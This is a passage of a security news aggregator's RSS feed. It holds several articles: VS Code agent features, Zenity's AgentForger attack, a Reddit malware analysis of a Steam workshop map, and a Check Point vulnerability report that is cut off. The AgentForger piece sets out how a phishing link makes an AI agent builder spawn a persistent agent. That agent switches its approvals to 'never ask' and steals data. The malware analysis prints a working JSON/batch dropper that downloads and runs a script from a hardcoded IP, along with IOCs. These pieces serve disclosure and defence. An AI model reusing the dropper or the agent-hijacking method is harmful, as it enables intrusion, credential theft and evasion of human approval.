<p class="wp-block-paragraph">Auf Inhalte, die nicht in den Kontext passen, sollte komplett verzichtet werden. Dieses Vorgehen mag zusätzlichen Aufwand bedeuten, führt aber oft zum Erfolg. Neben früheren Tätigkeiten sollten vor allem Erfolge benannt werden. Schließlich kaufen sich Unternehmen erfolgreiche Mitarbeiter ein und nicht nur ihre berufliche Erfahrung. Daher ist eine Leistungsbilanz, auf die in Regel häufig verzichtet wird, nur zu empfehlen.</p>



<p class="wp-block-paragraph"><strong>3. Nicht nur freie Stellen anvisieren</strong></p>



<p class="wp-block-paragraph">Zudem ist es sinnvoll, den eigenen Fokus ein wenig zu erweitern und sich nicht allein auf offene Stellen zu beschränken. Vielmehr kann auch die <a href="https://www.computerwoche.de/article/2743232/nie-mehr-am-arbeitsmarkt-vorbei.html" title="Initiativbewerbung" target="_blank">Initiativbewerbung</a> zu einer Anstellung führen. Je verantwortungsvoller die angestrebte Position dabei ist, desto mehr empfiehlt es sich, mit der Bewerbung nicht den Personalchef, sondern direkt die Unternehmensführung zu adressieren.</p>



<p class="wp-block-paragraph"><strong>4. Auf Stärken und Erfolge im Vorstellungsgespräch eingehen …</strong></p>



<p class="wp-block-paragraph">Nicht alleine in der schriftlichen Bewerbung muss der Kandidat erkennen lassen, warum er für das Unternehmen so wichtig ist. Auch im <a href="https://www.computerwoche.de/article/2655533/ueberzeugen-im-vorstellungsgespraech.html" title="Vorstellungsgespräch" target="_blank">Vorstellungsgespräch</a> sollte er sich von anderen Bewerbern unterscheiden. Was also hat er in früheren Berufen erlebt, welche Erfolge hat er gemeistert? Welche Qualifikationen bringt er mit, um die freie Stelle optimal zu besetzen und was möchte er in Zukunft noch erreichen?</p>



<p class="wp-block-paragraph"><strong>5. … und Antworten parat haben nach schwierigen Aufgaben</strong></p>



<p class="wp-block-paragraph">Im Bewerbungsgespräch ist es üblich, dass sich Fragen und Antworten an der Critical-Incident-Methode orientieren. Das heißt, dass der Personalchef wissen möchte, in welchen schwierigen Situationen sich der Bewerber in früheren Jobs befunden und wie er diese gemeistert hat. Es lohnt sich daher, sich auf dieses Schema vorzubereiten – zumal sich auch damit eine Unterscheidung gegenüber anderen Bewerbern erreichen lässt. (hk)</p>
</div></div></div>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Visual Studio Code 1.130 shines on Agents window]]></title>
<description><![CDATA[Microsoft has released Visual Studio Code 1.130, an update to the code editor that brings several improvements to the Agents window, along with enhancements to the agent host and the terminal.



VS Code 1.130 was released on July 22, one week after VS Code 1.129. Developers can access the releas...]]></description>
<link>https://tsecurity.de/de/3690529/ai-nachrichten/visual-studio-code-1130-shines-on-agents-window/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3690529/ai-nachrichten/visual-studio-code-1130-shines-on-agents-window/</guid>
<pubDate>Fri, 24 Jul 2026 03:37:26 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Microsoft has released Visual Studio Code 1.130, an update to the code editor that brings several improvements to the Agents window, along with enhancements to the agent host and the terminal.</p>



<p class="wp-block-paragraph">VS Code 1.130 was released on <a href="https://code.visualstudio.com/updates/v1_130#_agents-window-improvements-preview">July 22</a>, one week after <a href="https://www.infoworld.com/article/4199680/visual-studio-code-1-129-introduces-dedicated-agent-host.html">VS Code 1.129</a>. Developers can access the release for Windows, Linux, or Mac from <a href="https://code.visualstudio.com/Download?_exp_download=fb315fc982">code.visualstudio.com</a>. </p>



<p class="wp-block-paragraph">With the new release, the <a href="https://code.visualstudio.com/docs/agents/agents-window">Agents window</a> gets updates that make it easier to review changes and manage chats. File-level diff statistics help users assess the size of each file’s changes when scanning a multi-file diff. The window also gets a more compact multi-file diff that makes it easier to review changes, Microsoft said. The Agents window is a dedicated window in VS Code that lets users run and track multiple agent sessions in parallel across their projects, without opening each workspace in a separate window.</p>



<p class="wp-block-paragraph">Also with VS Code 1.130, assisted permissions for agent tool calls are available in the <a href="https://code.visualstudio.com/updates/v1_130#_the-agent-host" data-type="link" data-id="https://code.visualstudio.com/updates/v1_130#_the-agent-host">agent host</a>. With assisted permissions, the LLM evaluates the risk of each tool call and decides whether the tool can run or should require the user’s approval. The setting to enable assisted permissions is <code>chat.assistedPermissions.enabled</code>. In another agent host improvement, quick chats running on the agent host now use compact, single-line rows in the sessions list. Regular sessions retain a second line with change statistics, status, and timestamps. </p>



<p class="wp-block-paragraph">VS Code users now can open file links from Git diff output in the terminal when Git’s <a href="https://git-scm.com/docs/diff-config#Documentation/diff-config.txt-diffmnemonicPrefix" target="_blank" rel="noreferrer noopener"><code>diff.mnemonicPrefix</code></a> option is enabled. VS Code recognizes prefixes such as<code> i/</code> for the index and <code>w/</code> for the working tree, and removes the prefix from the link target so the correct file opens. When mnemonic prefixes are enabled, VS Code also recognizes the numeric prefixes produced by <code>git diff --no-index</code>.</p>



<p class="wp-block-paragraph">Timestamps for chat requests and responses now are displayed when users hover over the message toolbar. You can disable this through the <code>chat.verbose</code> setting. </p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[AgentForger proves AI agents can become persistent insider threats]]></title>
<description><![CDATA[A new attack method found by Zenity Labs reveals that AI agents are becoming persistent insiders that attackers can recruit, rather than malware they have to install.



Its researchers have discovered AgentForger, a phishing-based attack that silently creates and launches a fully autonomous AI a...]]></description>
<link>https://tsecurity.de/de/3690493/it-security-nachrichten/agentforger-proves-ai-agents-can-become-persistent-insider-threats/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3690493/it-security-nachrichten/agentforger-proves-ai-agents-can-become-persistent-insider-threats/</guid>
<pubDate>Fri, 24 Jul 2026 02:32:32 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">A new attack method found by Zenity Labs reveals that AI agents are becoming persistent insiders that attackers can recruit, rather than malware they have to install.</p>



<p class="wp-block-paragraph">Its researchers have discovered <a href="https://labs.zenity.io/p/agentforger-part-1-chatgpt-cross-site-agent-forgery" target="_blank" rel="noreferrer noopener">AgentForger</a>, a phishing-based attack that silently creates and launches a fully autonomous AI agent within OpenAI workspaces.</p>



<p class="wp-block-paragraph">Once running, the agent has full access to apps like Outlook, Slack, SharePoint, and Google Drive. It is configured to operate indefinitely without further user interaction, can approve its own access by toggling “never ask” settings, and can continue to act on new assignments sent via email by the attackers that control it. Broad, unfettered access to systems allows it to perform reconnaissance, harvest sensitive data and credentials, impersonate victims, and launch phishing campaigns.</p>



<p class="wp-block-paragraph">While OpenAI resolved the vulnerability four days after disclosure, on a larger scale, AgentForger sheds light on what can happen when <a href="https://www.csoonline.com/article/4200043/openai-model-escape-puts-enterprise-ai-defenses-on-notice.html" target="_blank">AI agents go rogue</a>.</p>



<p class="wp-block-paragraph">“We’re moving into a world where software doesn’t just help people work. It works alongside them,” said <a href="https://zenity.io/authors/michael-bargury" target="_blank" rel="noreferrer noopener">Michael Bargury</a>, co-founder and CTO of agentic AI security platform Zenity. “As AI agents become more capable, attackers will naturally look for ways to influence them, just as they’ve always looked for ways to influence people.”</p>



<h2 class="wp-block-heading">A ‘persistent operator’ that acts without approval</h2>



<p class="wp-block-paragraph">OpenAI’s Workspace Agents can connect and work autonomously across Outlook, Gmail, Slack, Google Drive, SharePoint, and Teams. Users open the agent builder, describe what the agent can do in natural language, connect to tools, set approvals, review and test, schedule actions, then publish. For instance, an agent can autonomously handle incoming emails, review and take actions with approval, gather information from various sources to send out daily briefings, or automatically respond to questions in ChatGPT or Slack channels.</p>



<p class="wp-block-paragraph">Normally, this is “useful automation,” Zenity AI red team researcher <a href="https://labs.zenity.io/authors/mike-takahashi" target="_blank" rel="noreferrer noopener">Mike Takahashi</a> wrote in a <a href="https://labs.zenity.io/p/agentforger-part-1-chatgpt-cross-site-agent-forgery" target="_blank" rel="noreferrer noopener">blog post</a>. But in this attack, “the same scheduler becomes the persistence mechanism.”</p>



<p class="wp-block-paragraph">The creation workflow kicks off the moment a user clicks on a phishing link containing instructions from the threat actor. For the attack to work, a victim must be logged into ChatGPT and Workspace Agents, and have at least one integration with another app, such as Outlook, Gmail, Slack, Google Drive, SharePoint, or Teams.</p>



<p class="wp-block-paragraph">Because those connections already exist, OAuth consent screens are not triggered. Furthermore, the victim does not need to click on another link, keep a Builder tab open, or even visit ChatGPT again.</p>



<p class="wp-block-paragraph">The forged agent is a “persistent operator;” it is installed on the original click and given a schedule, and at those predetermined times, the agent invokes itself, scans for emails from attacker addresses with the subject line “task”, carries those orders out, then returns results to the same attacker-controlled email address.</p>



<p class="wp-block-paragraph">It goes undetected because the attacker prompt instructs the Builder to toggle Outlook to never ask for approval of its actions. Typically, the default is “always ask,” to keep agents from taking unauthorized action; that switch gives agents the ability to act without asking for human approval.</p>



<p class="wp-block-paragraph">“AgentForger showed that an attacker could deploy an autonomous insider agent inside your ChatGPT workspace with a single click,” said Bargury. From there, it can continue to access information, harvest credentials from various sources, impersonate employees, and carry out phishing attacks and fraud while “leveraging the trusted victim’s identity.”</p>



<h2 class="wp-block-heading">A ‘planted accomplice’ that does all the work</h2>



<p class="wp-block-paragraph">Once activated, AgentForger can perform reconnaissance to create an internal map of a company. For instance, agents can scan Outlook, Slack, Teams, Google Drive, SharePoint, or calendar data to identify people, roles, active projects, internal discussions, or all-hands recurring meetings. This can help attackers identify where in the enterprise to target next, based on active teams and channels, projects in the works, or prominent users.</p>



<p class="wp-block-paragraph">“This is the kind of internal context an attacker normally has to build slowly,” Takahashi noted. But in this scenario, action is based on a single emailed assignment. The attacker’s “planted accomplice” does all the work.</p>



<p class="wp-block-paragraph">In another scenario, the agent can steal data by searching for and identifying financial documents, business agreements, or invoices. Or, it can steal credentials by scanning for messages containing passwords, one-time codes, access tokens, password recovery links, or API keys. Further, it can impersonate victims to carry out phishing scams, for instance, by sending legitimate-looking Teams messages instructing users to confirm their credentials on a fake Microsoft login page.</p>



<p class="wp-block-paragraph">In all cases, collected information is organized, analyzed, and sent back to the attacker.</p>



<p class="wp-block-paragraph">“AgentForger points to something much bigger than a single vulnerability,” said Bargury. “It’s less about one bug and more about understanding how the <a href="https://www.csoonline.com/article/4198963/ai-security-operations-and-the-new-race-against-time.html" target="_blank">security model changes</a> as AI becomes part of everyday business operations.”</p>



<h2 class="wp-block-heading">FOMO exposing security gaps</h2>



<p class="wp-block-paragraph">This isn’t necessarily about trust, but more about the need to move fast and adapt, Bargury emphasized. AI agents are helping employees automate work, make decisions faster, and get more done. But enterprises fear they’ll fall behind if they don’t move quickly enough.</p>



<p class="wp-block-paragraph">“The challenge is that we’re introducing a fundamentally new kind of technology into the enterprise,” said Bargury. “The pressure to integrate the next AI feature is outpacing the security controls needed to safely deploy it.”</p>



<p class="wp-block-paragraph">However, the answer isn’t to slow down adoption, he emphasized; the business value is too significant. Rather, the first step is understanding where AI agents exist, who created them, what they’re connected to, and what they’re allowed to do. And when it comes to autonomous agents, enterprises need to pay attention to the processes that trigger them: A schedule, an incoming email, or another automated event.</p>



<p class="wp-block-paragraph">“Those triggers should be governed just as carefully as the agent itself,” said Bargury.</p>



<p class="wp-block-paragraph">High-impact actions should require approval where appropriate, and security teams should be able to quickly disable an agent or its triggers if something doesn’t look right, he said.</p>



<p class="wp-block-paragraph">More broadly, AI agents are introducing the need for a new security model, he pointed out. The question is no longer just “Does this agent have permission?” It’s also, “Is this the behavior we intended?”</p>



<p class="wp-block-paragraph">“The organizations that answer both questions will be in the strongest position to adopt AI safely,” Bargury said.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Workshop map for MECCHA CHAMELEON is a malware dropper (full breakdown)]]></title>
<description><![CDATA[Table of Contents  Intro Initial Symptom First Look at the Workshop Files Verifying the Asset Files AssetRegistry.bin Reveals the First Clue Opening the UE5 Asset Container Reverse Engineering the Blueprint Extracting the Embedded Payload Analyzing the Dropper Script Confirming Execution on an Af...]]></description>
<link>https://tsecurity.de/de/3690349/malware-trojaner-viren/workshop-map-for-meccha-chameleon-is-a-malware-dropper-full-breakdown/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3690349/malware-trojaner-viren/workshop-map-for-meccha-chameleon-is-a-malware-dropper-full-breakdown/</guid>
<pubDate>Fri, 24 Jul 2026 00:21:11 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><h1>Table of Contents</h1> <ul> <li>Intro</li> <li>Initial Symptom</li> <li>First Look at the Workshop Files</li> <li>Verifying the Asset Files</li> <li>AssetRegistry.bin Reveals the First Clue</li> <li>Opening the UE5 Asset Container</li> <li>Reverse Engineering the Blueprint</li> <li>Extracting the Embedded Payload</li> <li>Analyzing the Dropper Script</li> <li>Confirming Execution on an Affected PC</li> <li>Did the Second Stage Execute?</li> <li>Analysis Summary</li> <li>Limitations &amp; Unknowns</li> <li>IOCs</li> <li>Final verdict</li> </ul> <p>A couple of my friends reported seeing a command prompt window briefly appear while Steam was downloading a custom workshop map. The map was being downloaded through the game's in-game lobby and, once the download completed it immediately began loading for the match. Since the command prompt window appeared during this transition, I decided to investigate the workshop files.</p> <p>What I found was a seemingly ordinary workshop map that contained what appears to be a malware dropper, despite having passed workshop review.</p> <p>I'm writing this up because, as far as I know, the map is still available, and because the techniques it uses to hide are worth understanding if you download workshop content. While there are still a few parts of the execution chain I can't fully explain, the artifacts themselves are interesting from a reverse engineering perspective.</p> <p><a href="https://preview.redd.it/nn7j9wf4q1fh1.png?width=1265&amp;format=png&amp;auto=webp&amp;s=0276954f24bafc16cee6b2fc2569c12bedeaea51">https://preview.redd.it/nn7j9wf4q1fh1.png?width=1265&amp;format=png&amp;auto=webp&amp;s=0276954f24bafc16cee6b2fc2569c12bedeaea51</a></p> <p><strong>1): The Initial Symptom</strong></p> <p>A black command prompt window flashed on screen for about a second before disappearing. It appeared while Steam was still downloading the workshop map, just as the game was transitioning into loading it for the match. There were no crashes, error messages, or any other unusual behavior. On its own, it would have been easy to dismiss as Steam running a background process, but seeing a console window appear during a workshop download / match launch was unusual enough that I decided to investigate.</p> <p><strong>2): First Look at the Workshop Files</strong></p> <p>The workshop content is located here:</p> <pre><code>Steam\steamapps\workshop\content\4704690\3765145606\ </code></pre> <p>At first glance, there’s nothing suspicious in the folder. The contents are:</p> <pre><code>AssetRegistry.bin Preview.png Sample.vdf SampleMyUGCMecchaCModKit_Load-Windows.pak SampleMyUGCMecchaCModKit_Load-Windows.ucas SampleMyUGCMecchaCModKit_Load-Windows.utoc </code></pre> <p>There are no executables, DLLs, batch files, or scripts. The <code>.pak</code>, <code>.ucas</code>, and <code>.utoc</code> files are simply the standard Unreal Engine 5 asset container format used for packaging game content exactly what you would expect to see from a UE5 map or mod.</p> <p>This is worth emphasizing: if you were manually checking this folder for malware, there would be no obvious red flags here. Nothing in this directory suggests anything malicious. That is likely why it passed review in the first place.</p> <p><strong>3): Verifying the Asset Files</strong></p> <p>File extensions are easy to spoof, so I checked the actual file headers and scanned the contents for embedded executable data.</p> <p>The results:</p> <ul> <li>utoc starts with <code>-==--==--==--==-</code>, which is the real IoStore magic</li> <li>pak has the correct <code>0x5A6F12E1</code> footer magic</li> <li>no MZ/PE, ELF or ZIP headers anywhere in any file</li> </ul> <p>The files appear to be valid Unreal Engine asset containers, not disguised executables. There is no standalone executable payload present in this mod. If there is unexpected behavior, it would have to be occurring through the game’s normal asset-loading pipeline rather than from an included executable file.</p> <p><strong>4): AssetRegistry.bin Reveals the First Clue</strong></p> <p>This is the detail that stands out most from the entire investigation.</p> <p>AssetRegistry.bin is largely readable metadata. You can open it in a text editor and see references to the actors placed throughout the maps. Normally, it contains exactly the kind of information you would expect: StaticMeshActor, PointLight, PlayerStart, and other standard Unreal Engine objects.</p> <p>However, one Blueprint actor immediately stands out:</p> <pre><code>/Game/Mods/NewMap.NewMap:PersistentLevel.BP_RCE_Test_C_0 </code></pre> <p>Its class resolves as:</p> <pre><code>BP_AmbientController_C </code></pre> <p>Those two names together are unusual. The class name suggests a harmless environmental or lighting-related system especially since it appears under folders such as Environment and Lighting. However, the placed actor still retains the older name BP_RCE_Test_C_0.</p> <p>In Unreal Engine, this can happen because placed actors keep the name they were created with even if the Blueprint class is later renamed. Renaming the class does not automatically rename every existing instance placed in maps.</p> <p>That means the BP_RCE_Test name likely existed at an earlier point in the asset’s history. Whether intentional or not, the old identifier remains embedded in the map metadata.</p> <p>The same reference appears across three separate maps included in the workshop item, including a NewMap_Backup file that appears to have been left in the upload.</p> <p><strong>5): Opening the UE5 Asset Container</strong></p> <p>The Blueprint data is stored inside the Oodle-compressed .ucas container. Reading the accompanying .utoc metadata reveals:</p> <pre><code>chunks ............ 57 blocks ............ 131 (130 Oodle-compressed) flags ............. Compressed | Indexed </code></pre> <p>No encryption flag is present, meaning the container can be inspected using available Unreal Engine asset tooling and compatible Oodle/Kraken decompression support. All 131 blocks decompress successfully, producing roughly 5.3 MB of extracted data.</p> <p>The container contains 55 assets in total: materials, meshes, textures, four maps, and three Blueprints. Two of those Blueprints appear to be untouched sample assets from the official ModKit, containing no custom logic.</p> <p>Searching across the extracted asset data revealed only a small number of notable references:</p> <pre><code>ReceiveBeginPlay ....... 1 ToFile ................. 1 GetPlatformUserDir ..... 1 powershell ............. 1 </code></pre> <p>These references are concentrated in a single Blueprint rather than being distributed throughout the package. There does not appear to be additional hidden logic elsewhere in the container, which makes the relevant behavior easier to isolate and analyze.</p> <p><strong>6): Reverse Engineering the Blueprint</strong></p> <p>The complete function chain is:</p> <pre><code>ReceiveBeginPlay ↓ GetPlatformUserDir ↓ Replace ↓ Concat_StrStr ↓ FromString (JSON) ↓ ToFile </code></pre> <p>Despite the Blueprint being named like an environment or lighting system, the logic does not appear to perform any lighting, ambience, or world-management functions. Instead, it constructs a file path and writes data to disk.</p> <p>Tracing the Blueprint bytecode shows the path construction:</p> <pre><code>dir = GetPlatformUserDir() // C:/Users/&lt;user&gt;/Documents/ path = dir + "s.bat" </code></pre> <p>ReceiveBeginPlay is normally called when the map begins loading, which does not fully match the behavior reported by some users, who observed activity during the download process itself. That discrepancy is not explained by the Blueprint logic alone, so it is worth treating those reports separately from the behavior confirmed through asset analysis.</p> <p><strong>7): Extracting the Embedded Payload</strong></p> <p>A single embedded string inside the Blueprint contains the following data:</p> <pre><code>{"x\"&amp;if not defined _Z (set _Z=1&amp;start /min cmd /c %~f0&amp;exit) else ( powershell -w hidden -ep bypass -c iwr http://31.57.34.228/work/steamb.bat -OutFile $env:TEMP\s.bat; cmd /c $env:TEMP\s.bat&amp;exit)&amp;\"x":"1"} </code></pre> <p>The string is structured as a JSON/batch polyglot: it is valid JSON while also containing batch command syntax inside the JSON key. The command content is therefore preserved when written as JSON data, but can also be interpreted as a batch script if the resulting file is executed.</p> <p>This format is significant because the earlier Blueprint analysis showed that the file-writing step uses <code>ToFile</code>, which writes JSON data. The embedded content appears designed to satisfy that JSON requirement while retaining executable command syntax.</p> <p>The combination of a JSON-compatible wrapper and embedded command execution logic is not typical of normal Unreal Engine asset data and is a strong indicator that the content was deliberately constructed rather than being accidental or generated by the engine.</p> <p><strong>8): Analyzing the Dropper Script</strong></p> <p>The extracted script is also human-readable:</p> <pre><code>if not defined _Z ( set _Z=1 start /min cmd /c %~f0 exit ) else ( powershell -w hidden -ep bypass -c ^ iwr http://31.57.34.228/work/steamb.bat -OutFile $env:TEMP\s.bat cmd /c $env:TEMP\s.bat exit ) </code></pre> <p>The script uses a simple two-stage execution flow.</p> <p>On the first run, <code>_Z</code> is not defined, so the script sets the variable, launches a minimized copy of itself, and exits. This relaunch behavior explains the brief command window flash reported by some users. At this stage, the script is acting as a launcher rather than performing the main action.</p> <p>On the second run, the <code>_Z</code> variable is already present, so the script follows the alternate branch. It starts PowerShell with a hidden window, modifies the execution policy for that process, downloads <code>steamb.bat</code> from a hardcoded external address, saves it to the temporary directory, and executes it.</p> <p>The <code>_Z</code> check appears to exist solely to prevent the script from repeatedly relaunching itself.</p> <p>The script itself is relatively simple: there is no evidence here of persistence mechanisms, privilege escalation, or sophisticated obfuscation. Its main purpose appears to be retrieving and executing a second-stage script. That second stage is hosted externally, meaning its contents can change independently of the original mod package.</p> <p><strong>9): Confirming Execution on an Affected PC</strong></p> <p>On one affected system, I found a file that was byte-for-byte identical to the payload string embedded in the Blueprint. It was located at the exact path identified during the bytecode analysis.</p> <p>This confirms that the Blueprint logic was not just theoretical, the file-writing behavior observed during reverse engineering occurred on a real system.</p> <p><a href="https://preview.redd.it/hav7l33dq1fh1.png?width=2252&amp;format=png&amp;auto=webp&amp;s=9fc74ff8ac7e3607889cb9a4f052d8d73e0f2f32">https://preview.redd.it/hav7l33dq1fh1.png?width=2252&amp;format=png&amp;auto=webp&amp;s=9fc74ff8ac7e3607889cb9a4f052d8d73e0f2f32</a></p> <p><strong>10): Did the second stage execute?</strong></p> <p>The second-stage file, <code>%TEMP%\s.bat</code>, was not present on the affected machine. The PowerShell Operational log explains why:</p> <p><a href="https://preview.redd.it/srmpq28pq1fh1.png?width=1577&amp;format=png&amp;auto=webp&amp;s=6a2841345f423906fafaa570acd20d85636e3b70">https://preview.redd.it/srmpq28pq1fh1.png?width=1577&amp;format=png&amp;auto=webp&amp;s=6a2841345f423906fafaa570acd20d85636e3b70</a></p> <p>The download request failed with an HTTP 404 response at the time of execution. Because the file was never successfully retrieved, nothing was written to disk and the following <code>cmd /c</code> command had no script to execute.</p> <p>On this system, the second stage did not execute. The contents and behavior of the downloaded payload remain unknown because the external file was unavailable at the time of analysis.</p> <p>The address embedded in the script resolves to <code>31.57.34.228</code>. At the time of analysis, the IP address was geolocated to Amsterdam, Netherlands, and was associated with Blockchain Creek B.V. (ASN 207994).</p> <p>This information identifies the hosting infrastructure used by the download URL, but it does not by itself identify the operator of the server or establish attribution. The important finding is that the Blueprint attempted to retrieve an additional payload from an external location, rather than containing the final payload entirely within the workshop files.</p> <p><a href="https://preview.redd.it/y1b4bj6sq1fh1.png?width=2546&amp;format=png&amp;auto=webp&amp;s=141474bd203a7d6529591ae09487da2e35e58026">https://preview.redd.it/y1b4bj6sq1fh1.png?width=2546&amp;format=png&amp;auto=webp&amp;s=141474bd203a7d6529591ae09487da2e35e58026</a></p> <p><strong>11): Analysis Summary</strong></p> <p>Based on the evidence recovered from the workshop item, this should be treated as malicious content. That conclusion does not rely on a single indicator; it comes from the combination of several independent findings:</p> <ul> <li>The Workshop uploader account appears to have been created only about one week before the item was published</li> <li>The Workshop map currently does not allow users to leave comments or ratings</li> <li>The only Blueprint containing custom logic was originally identified as <code>BP_RCE_Test</code> and later appeared under a name consistent with a harmless environment or lighting controller.</li> <li>The Blueprint executes automatically through <code>ReceiveBeginPlay</code>, rather than requiring an intentional user action inside the map.</li> <li>Its logic writes data outside the game directory into the user’s Documents folder, which is unrelated to normal map or asset behavior.</li> <li>The written content is a deliberately structured JSON/batch polyglot, allowing data written through a JSON-only function to retain executable batch syntax.</li> <li>That script launches hidden PowerShell, bypasses the local execution policy for the process, retrieves a second-stage file from a hardcoded external address, and attempts to execute it.</li> </ul> <p>What remains unknown is the purpose of the final payload. The second-stage script was not successfully retrieved during analysis and was no longer available from the remote location, so its behavior cannot be determined. Claims that it was specifically an infostealer, loader, or another type of malware would be speculation without that payload.</p> <p><strong>12): Limitations &amp; Unknowns</strong></p> <p><strong>What does</strong> <code>steamb.bat</code> <strong>do?</strong></p> <p>Unknown. The second-stage payload was not delivered during analysis, so its final behavior cannot be determined from the available evidence.</p> <h1>IOCs</h1> <pre><code>Workshop item 3765145606 "Laser Tag Neon" (appid 4704690) comments and ratings disabled on the listing uploader account roughly one week old Asset BP_AmbientController.uasset (originally BP_RCE_Test_C_0) Dropped file %USERPROFILE%\Documents\s.bat C2 http://31.57.34.228/work/steamb.bat Second stage steamb.bat (never delivered, contents unknown) Asset build 2026-06-09 22:37:14 s.bat 210 bytes sha256 1ff540bc3c493a93059e602b414ba61027ed1a2b8a079f6197b0718f4a2101b6 md5 04d6dfadd5248c995951707e27520ade container utoc aea429fbb44d552c917c22018e838e4154e68a8cac5806f7a8e30b61586ba2a6 ucas fbd932faba4ec8d614fbd7a68636e177213259bafe2babdcdc47c2a8acd6d569 pak aa58f9061a4e39e3f5a28395c56cfa5b0072d90e66054894f9c8022e81e396c9 </code></pre> <p><strong>Final Verdict</strong></p> <p>Based on everything I found, I believe this workshop item is very likely malicious, but there are still parts of the execution chain I couldn't directly observe.</p> <p>What I can say with confidence is that the asset contains a Blueprint whose only meaningful purpose is to write a batch file outside the game's directory into the user's Documents folder. That batch file then attempts to launch PowerShell with the execution policy bypassed, download a second batch file from a hard-coded external server, and execute it.</p> <p>I can't think of a legitimate reason for a Steam workshop map to write a .bat file into a user's Documents folder and then use PowerShell to fetch and run another <code>.bat</code> file from the Internet. Even without knowing what the second stage contained, that behavior is extremely difficult to explain as anything other than a malware delivery chain.</p> <p>Could there be some edge case I'm missing? Absolutely. That's why I've tried to separate facts from assumptions throughout this write-up. But given the evidence recovered from the assets themselves, I think calling this a malicious dropper is the conclusion best supported by the data</p> <p>Further independent investigation is encouraged, particularly if additional evidence becomes available. For now, the workshop item and the uploader have been reported and flagged for review.</p> <p>Cheers and stay safe!</p> <p>FeintBe</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/feintbe"> /u/feintbe </a> <br> <span><a href="https://www.reddit.com/r/MalwareAnalysis/comments/1v4sged/workshop_map_for_meccha_chameleon_is_a_malware/">[link]</a></span>   <span><a href="https://www.reddit.com/r/MalwareAnalysis/comments/1v4sged/workshop_map_for_meccha_chameleon_is_a_malware/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Codeberg gives vibe-coded projects the toss, promotes human FLOSS]]></title>
<description><![CDATA[AI no longer welcome in human-focused community]]></description>
<link>https://tsecurity.de/de/3690165/it-nachrichten/codeberg-gives-vibe-coded-projects-the-toss-promotes-human-floss/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3690165/it-nachrichten/codeberg-gives-vibe-coded-projects-the-toss-promotes-human-floss/</guid>
<pubDate>Thu, 23 Jul 2026 22:36:56 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[AI no longer welcome in human-focused community]]></content:encoded>
</item>
<item>
<title><![CDATA[Check Point hole grants unauthenticated attackers full SmartConsole admin privileges]]></title>
<description><![CDATA[Check Point has confirmed that a critical security hole in its SmartConsole management tool, one that allows unauthenticated attackers to assume full admin privileges, is now being exploited in the wild. The vulnerability, CVE-2026-16232, was given a CVSS score of 9.3.



In its security alert, C...]]></description>
<link>https://tsecurity.de/de/3690156/it-security-nachrichten/check-point-hole-grants-unauthenticated-attackers-full-smartconsole-admin-privileges/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3690156/it-security-nachrichten/check-point-hole-grants-unauthenticated-attackers-full-smartconsole-admin-privileges/</guid>
<pubDate>Thu, 23 Jul 2026 22:25:55 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Check Point has confirmed that a critical security hole in its SmartConsole management tool, one that <a href="https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-16232" target="_blank" rel="noreferrer noopener">allows unauthenticated attackers</a> to assume full admin privileges, is now being exploited in the wild. The vulnerability, <a href="https://github.com/advisories/ghsa-m2xx-23gx-734v" target="_blank" rel="noreferrer noopener">CVE-2026-16232</a>, was given a CVSS score of 9.3.</p>



<p class="wp-block-paragraph">In its security alert, <a href="https://support.checkpoint.com/results/sk/sk185169/" target="_blank" rel="noreferrer noopener">Check Point described</a> the bug as one allowing an unauthenticated attacker to “obtain an application login token and use it to login via SmartConsole with full admin privileges and apply changes to the security policy and security configuration.”</p>



<p class="wp-block-paragraph">The company has <a href="https://sc1.checkpoint.com/documents/Jumbo_HFA/R82.10/R82.10/R82.10-List-of-all-Resolved-Issues.htm" target="_blank" rel="noreferrer noopener">released a patch</a> for the bug and also recommends that users “limit Trusted Clients, GUI clients, to trusted IP addresses/subnets.” That approach has always been a best practice, but practical networking realities today make it challenging to maintain. <a href="https://www.csoonline.com/article/4195311/check-point-cto-jonathan-zanger-sees-ai-elevating-the-value-of-cyber.html" target="_blank">Check Point</a> said that the exploit has impacted ten of its customers, all of whom it had notified directly.</p>



<h2 class="wp-block-heading">Far worse than most</h2>



<p class="wp-block-paragraph"><a href="https://my.idc.com/getdoc.jsp?containerId=PRF004767" target="_blank" rel="noreferrer noopener">Frank Dickson</a>, group VP for security at IDC, said this security hole is far worse than most.</p>



